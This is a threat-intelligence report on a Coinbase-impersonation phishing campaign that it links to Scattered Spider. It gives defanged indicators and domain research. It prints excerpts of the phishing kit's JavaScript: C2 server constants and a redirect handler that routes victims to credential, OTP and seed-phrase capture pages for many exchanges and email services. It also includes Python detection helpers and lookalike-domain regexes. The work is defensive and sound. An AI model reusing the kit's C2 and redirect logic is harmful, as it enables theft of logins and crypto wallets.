CryptoChameleon Campaign Associations with Scattered Spider

Date of Report: 2024-12-04
Reporting Agency: Cipher
Report Composed By: Cipher
Type of Incident: Social Engineering, Phishing
Phishing Target: @Tayvano
Estimated Loss: N/A - No user impacts

Executive Summary

Overview: This report expands on the capabilities of a threat actor that research indicates is targeting cryptocurrency companies and developers.

Key Information             Detail
Incident Date and Time      2024-11-30
Phishing Website            1735562-coinbase[.]com/captcha?origin=.
Snapshot of Malicious Site  https://urlquery.net/report/8cea3a49-64a4-4373-a52a-7c5a73cd5e32
Attacker Email Sender       help@xn--conbase-sfb[.]com
Attacker Phone              802-772-0215

Report TLP Classification: 🟢 Green

Incident Background

Phishing Attempt Events

On November 30, 2024, @Tayvano received repeated spam phone calls from 802-772-0215 and was eventually emailed the link 1735562-coinbase[.]com/captcha?origin=. from the sender help@xn--conbase-sfb[.]com. JavaScript functionality observed on the malicious page indicates targeted social engineering and phishing attacks originating from IP 195[.]133[.]92[.]187. Analysis by the target, @Tayvano, identified the control servers hxxps[://]c26[.]commandandcontrolserver[.]com and hxxps[://]c26x2[.]commandandcontrolserver[.]com/api. That initial threat report and analysis by @Tayvano prompted the further analysis presented here. The purpose of this report is to expand on correlations observed with past known Scattered Spider activity.

Financial Impact

No financial impacts or further user impacts were reported, as the target is highly technical and an information security subject matter expert.

Technical Analysis


Resources loaded by the phishing page:

URL                                               Size    First Seen         Last Seen
1735562-coinbase[.]com/js/index/core[.]js         301 B   2024-12-01 05:51   2024-12-01 05:51
1735562-coinbase[.]com/js/init[.]js               6.9 kB  2024-12-01 05:51   2024-12-01 05:51
cdn[.]socket[.]io/4.5.4/socket[.]io[.]min[.]js    44 kB   2023-03-12 17:27   2024-12-01 11:09
1735562-coinbase[.]com/js/consts[.]js             161 B   2024-12-01 05:51   2024-12-01 05:51
1735562-coinbase[.]com/js/index/script[.]js       232 B   2023-11-19 14:01   2024-12-01 05:51

The report by Lookout attributes this phishing sample to the "CryptoChameleon" campaign; the attack vector uses the consts[.]js file to communicate with the control servers. However, further inspection and random sampling of the credential phishing instances indicate a pattern more closely aligned with Scattered Spider activity.

const SERVER_URL = 'hxxps[://]c26[.]commandandcontrolserver[.]com';
const API_URL = 'hxxps[://]c26x2[.]commandandcontrolserver[.]com/api';
const OLD_PW_ON_RESET_PAGE = true;

The wide array of redirect functionality can be observed at the path: /js/init[.]js.

Relevant snippet from /js/init[.]js:
socket.on('userRedirect', async (data) => {
    if (sessionStorage.getItem('user') === data.user && sessionStorage.getItem('user') !== null) {
        const redirectTkn = data.redirectTkn;
        const d = await fetch(`${API_URL}/verify`, {
            method: 'POST',
            headers: {
                'Content-Type': 'application/json'
            },
            body: JSON.stringify({ token: redirectTkn }),
        });
        const res = await d.json();
        if (!res.valid) return;
        const basePath = window.location.href.substring(0, window.location.href.lastIndexOf('/'));
        if (data.response === '/otp_sms' || data.response === '/twitter_sms') { document.location.href = basePath + data.response + '?n=' + data.digits + '&e=' + data.e + '&f=' + data.format; }
        else if (data.response === '/outlook_otp' || data.response === '/binance_sms') { document.location.href = basePath + data.response + '?n=' + data.digits + '&e=' + data.e; }
        else if (data.response === '/custom') { document.location.href = basePath + data.response + '?h=' + data.header + '&p=' + data.paragraph; }

        else if (
            data.response === '/otp_auth' || data.response === '/yahoo' ||
            data.response === '/reset_password' || data.response === '/outlook_pw' ||
            data.response === '/gemini_otp' || data.response === '/gemini_reset' ||
            data.response === '/gemini_seed' || data.response === '/kraken' ||
            data.response === '/kraken_otp' || data.response === '/icloud' ||
            data.response === '/twitter' || data.response === '/twitter_auth' ||
            data.response === '/gmail' || data.response === '/binance' ||
            data.response === '/binance_auth' || data.response === '/gemini_signin' ||
            data.response === '/uphold' || data.response === '/uphold_otp' ||
            data.response === '/uphold_reset' || data.response === '/uphold_seed' ||
            data.response === '/binance_seed' || data.response === '/kraken_seed' ||
            data.response === '/lastpass' || data.response === '/lastpass_otp' ||
            data.response === '/swan' || data.response === '/swan_seed' ||
            data.response === '/swan_eotp' || data.response === '/swan_otp' ||
            data.response === '/swan_auth' || data.response === '/swan_dvc' ||
            data.response === '/gemini_dvc' || data.response === '/kucoin' ||
            data.response === '/kucoin_otp' || data.response === '/kucoin_pin' ||
            data.response === '/kucoin_seed'
        ) {
            if (data.response === '/gmail' && data.e === 1) { document.location.href = basePath + '/gmail_pw?e=' + data.e; }
            else { document.location.href = basePath + data.response + '?e=' + data.e; }
        }
        else if (data.response === '/signin') {
            document.location.href = basePath + data.response + '?e=' + data.e + '&t=' + data.t;
        }

        else if (data.response === '/pending_review') {
            document.location.href = basePath + data.response + '?d=' + btoa(data.date);
        }

        else if (data.response === '/aol_otp' || data.response === '/yahoo_otp' || data.response === '/gmail_otp') {
            document.location.href = basePath + data.response + '?email=' + data.address + '&n=' + data.digits + '&e=' + data.e;
        }

        else if (data.response === '/yahoo_eotp') {
            document.location.href = basePath + data.response + '?email=' + data.address + '&recovery=' + data.recovery + '&e=' + data.e;
        }

        else if (data.response == '/gmail_eotp' || data.response == '/gmail_auth' || data.response == '/otp_email') {
            document.location.href = basePath + data.response + '?email=' + data.address + '&e=' + data.e;
        }

        else if (data.response == '/lastpass_inbox' || data.response == '/dvc_press') {
            document.location.href = basePath + data.response + '?email=' + data.address;
        }

        else if (data.response === '/gmail_device') {
            document.location.href = basePath + data.response + '?email=' + data.address + '&n=' + data.digits + '&app=' + data.app;
        }

        else if (data.response === '/aol' || data.response === '/gmail_backup') {
            document.location.href = basePath + data.response + '?email=' + data.address + '&e=' + data.e;
        }

        else if (data.response === '/seed') {
            document.location.href = basePath + data.response + '?auth=' + data.auth;
        }

        else if (data.response === '/cb_customwallet') {
            document.location.href = basePath + data.response + '?w=' + data.w;
        }

        else if (data.response === '/icloud_otp') {
            document.location.href = basePath + data.response + '?p=' + data.p + '&e=' + data.e;
        }

        else if (data.response === '/device_auth') {
            document.location.href = basePath + data.response + '?device=' + data.device + '&location=' + data.location;
        }

        else if (data.response === '/redirect') {
            document.location.href = basePath + data.response + '?url=' + encodeURIComponent(data.url);
        }

        else if (data.response === '/icloud_2fa') {
            document.location.href = basePath + data.response + '?d=' + data.d;
        }

        else if (data.response === '/cbw1') {
            document.location.href = basePath + data.response + '?s=' + btoa(data.s);
        }

        else {
            document.location.href = basePath + data.response;
        }
    }
});
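The consts[.]js and init[.]js excerpts above give a defender a usable fingerprint: the kit's constants, the socket-driven 'userRedirect' handler, and the list of lure routes it can push a victim to. The following detection helper is an added example written for this report, not code from the kit or from any analyst cited here; the marker strings are taken from the excerpts above, and the sample scripts are constructed for illustration.

```python
import re

# String indicators lifted from the consts.js / init.js excerpts in this report
KIT_MARKERS = (
    "socket.on('userRedirect'",
    "redirectTkn",
    "${API_URL}/verify",
    "OLD_PW_ON_RESET_PAGE",
    "sessionStorage.getItem('user')",
)

# Every lure route in init.js is compared against data.response with == or ===
LURE_PATH_RE = re.compile(r"data\.response\s*===?\s*'(/[a-z0-9_]+)'")


def fingerprint_js(js_text):
    """Return the kit markers present and the lure paths the script can redirect to."""
    markers = [m for m in KIT_MARKERS if m in js_text]
    paths = sorted(set(LURE_PATH_RE.findall(js_text)))
    # seed-phrase capture pages are the highest-impact routes, so call them out
    seed_paths = [p for p in paths if p.endswith("_seed") or p == "/seed"]
    return {"markers": markers, "paths": paths, "seed_paths": seed_paths}


def is_kit(js_text, min_markers=2):
    """Flag a script as this kit when enough markers and at least one lure route appear."""
    fp = fingerprint_js(js_text)
    return len(fp["markers"]) >= min_markers and len(fp["paths"]) > 0


# Constructed sample: a cut-down fragment in the shape of the init.js excerpt above
SAMPLE_KIT_JS = """
socket.on('userRedirect', async (data) => {
    if (sessionStorage.getItem('user') === data.user) {
        const redirectTkn = data.redirectTkn;
        if (data.response === '/gemini_seed' || data.response === '/kraken_seed') {
            document.location.href = basePath + data.response + '?e=' + data.e;
        } else if (data.response == '/lastpass_inbox') {
            document.location.href = basePath + data.response;
        }
    }
});
"""

# Constructed benign socket.io usage that must not be flagged
SAMPLE_BENIGN_JS = "socket.on('chat', (msg) => { render(msg); });"
```

Run it over scripts pulled from a urlscan or urlquery snapshot to triage which lure routes a given clone is wired for.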

Domain Research

Domains were searched for using Validin, Censys, Silent Push, and UrlScan[.]io in order to maximize research surface.


https://www.virustotal.com/graph/embed/g97f881e0970340eca55e0b33440d413ee77a2a8a3c024f7c9dffd7942e36fd8f?theme=dark

Baseline cryptocurrency domain name regex pattern analysis unit:

\b(?:www[.]|\d+[-])?0*\d{5,}-(coinbase|binance|gemini|kraken|ledger|trezor)\[?\.\]?com\b

The unit was used to compose a counter pattern for reviewing instances not matching the coinbase

Google impersonation sample (2024-12-07):
hxxps[://]cancel-google[.]com/captcha?origin=gmail
https://pro.urlscan.io/result/460e3ae0-9718-431c-b065-84ddab1d525c
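To show the baseline regex and a counter pattern working together, here is an added example (written for this report, not the analyst's own tooling) that triages defanged hostnames: the baseline pattern is copied verbatim from above, while the broader COUNTER pattern, which accepts any brand label after the numeric prefix, is an assumption introduced here. The sample hosts are a constructed subset of the kinds of hostnames this report observed on 195[.]133[.]92[.]187.

```python
import re

# Baseline pattern exactly as given in this report (handles defanged "[.]" and plain ".")
BASELINE = re.compile(
    r"\b(?:www[.]|\d+[-])?0*\d{5,}-(coinbase|binance|gemini|kraken|ledger|trezor)\[?\.\]?com\b"
)

# Counter pattern (an assumption added here, not the report's own): same
# "<5+ digits>-<label>" shape with any brand label, so hosts the baseline
# brand list misses (google, apple, uphold, swanbtc, cb, ...) still surface.
COUNTER = re.compile(r"\b(?:www[.]|\d+[-])?0*\d{5,}-([a-z]+)\[?\.\]?(?:com|io|info)\b")

# Constructed sample of the hostname shapes seen on 195[.]133[.]92[.]187
SAMPLE_HOSTS = [
    "12518234-coinbase[.]com",
    "www[.]125980-binance[.]com",
    "1502759-ledger[.]com",
    "149024-google[.]com",
    "1750314-apple[.]com",
    "157192-uphold[.]com",
    "195824-swanbtc[.]com",
    "177250-cb[.]com",
    "coinbasehelpdesk[.]com",
    "195-133-92-187[.]waldertype[.]com",
]


def classify(hosts):
    """Split hosts into baseline hits, counter-pattern-only hits, and everything else."""
    baseline, counter_only, other = [], [], []
    for host in hosts:
        if BASELINE.search(host):
            baseline.append(host)
        elif COUNTER.search(host):
            counter_only.append(host)
        else:
            other.append(host)
    return baseline, counter_only, other


def brand_counts(hosts):
    """Count brand labels across all numeric-prefix hosts (both patterns)."""
    counts = {}
    for host in hosts:
        match = COUNTER.search(host)
        if match:
            counts[match.group(1)] = counts.get(match.group(1), 0) + 1
    return counts
```

Hosts that land in the counter-only bucket are the candidates for extending the baseline brand list; hosts in neither bucket (helpdesk-style names, the waldertype host) need a separate pattern.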

Image (not available): example of homograph domain names, sourced from
https://www.researchgate.net/figure/Example-of-homograph-domain-names_fig2_335823813

Domains observed at IP 195[.]133[.]92[.]187 at the time of the event


Report Objectives

This report is intended to inform cryptocurrency companies and developers of an active phishing campaign that could impact anyone. It is also intended to convey the issue to law enforcement for their extended analysis, and to draw greater attention from the information security community, since those perpetrating these attacks can modify domain names and expand their reach quite rapidly.

Conclusion

This incident highlights the sophisticated methods used by cybercriminals in phishing campaigns and social engineering attacks. It emphasizes the need for heightened awareness and security measures.

Interaction with Law Enforcement

Agencies Notified: N/A
Notification Date:
Report Reference Number:

References and Attachments